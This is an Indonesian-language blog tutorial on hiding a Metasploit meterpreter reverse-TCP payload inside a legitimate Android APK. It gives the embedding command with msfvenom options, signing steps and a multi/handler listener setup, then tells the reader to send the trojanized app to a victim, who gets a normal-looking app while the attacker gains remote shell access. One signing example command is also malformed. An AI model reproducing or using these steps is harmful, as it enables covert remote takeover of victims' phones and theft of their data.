Backdooring APK Files With Metasploit Payloads

Sesuai judul nya, kali ini saya akan share cara menyisipkan payloads pada aplikasi android ( .apk ) . Dengan begitu aplikasi apk yang diinstall oleh korban tetap berjalan sebagaimana mestinya, hanya saja payloads juga ikut tereksekusi saat aplikasi dijalankan. Oke langsung saja ke tutorial nya .

Untuk bahan bahannya siahkan download :

Di dalam nya sudah ada tools dalam bahasa ruby untuk meng-embed payload ke dalam file apk nya, serta SignAPK agar file apk nya bisa terinstall di semua jenis android.
Pertama, kalian download dulu file apk yang ingin disisipi backdoor. Bisa di apk4fun atau situs download apk lainnya. Jika sudah punya, skip ke langkah kedua.
Masukkan file .apk nya tadi kedalam satu folder dengan apk-embed.rb .
Lalu masukkan command :

sudo ruby apk-embed.rb [aplikasi.apk] [msfvenom options]

Contoh :

sudo ruby apk-embed.rb com.leo.appmaster-3.3.2.apk -p android/meterpreter/reverse_tcp LHOST=192.168.48.1 LPORT=666

Penggunaan sudo disini karena msfvenom membutuhkan hak akses root. Jika kalian sudah berada dalam posisi root sebelumnya, tidak perlu menggunakan sudo.
Jika ada notice :

Infected file com_backdoored.apk ready.

Berarti proses backdooring sudah selesai.
Tahap selanjutnya adalah melakukan sign apk agar file apk yang kita jadikan payload nanti kompatibel di semua versi android.
caranya, masukkan file com_backdoored.apk tadi ke folder SignAPK.
Lalu masukkan perintah :

java -jar signapk.jar certificate.pem key.pk8 fileasli.apk filehasilsign.apk

Contoh :

java -jar certificate.pem key.pk8 com_backdoored.apk com.leo.appmaster-3.3.2.apk

Selanjutnya kita set metasploit dengan ip dan port yang sama seperti di payload yang dibuat sebelum nya.

msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.48.1
LHOST => 192.168.48.1
msf exploit(handler) > set LPORT 666
LPORT => 666
msf exploit(handler) > exploit

Nah tinggal kirim apk file tadi ke korban.
APK yang telah disisipi payload tadi tetap akan terlihat normal di device korban.

Hanya saja saat aplikasi tersebut dibuka oleh korban, kita juga mendapatkan meterpreter akses di terminal kita.

Untuk yang masih bingung silahkan lihat video nya disini :

Nah mungkin sekian dulu tutorial kali ini, semoga bermanfaat.
Share juga ke teman teman mu biar mereka tau.
Notice :
Saya menulis ini dengan tangan saya, dengan pemikiran saya, dengan gaya bahasa saya, jadi tolong yang mau copas sertakan sumber link hidup ke postingan ini.
Best regards :
Shares

9 Comments

Leave a Reply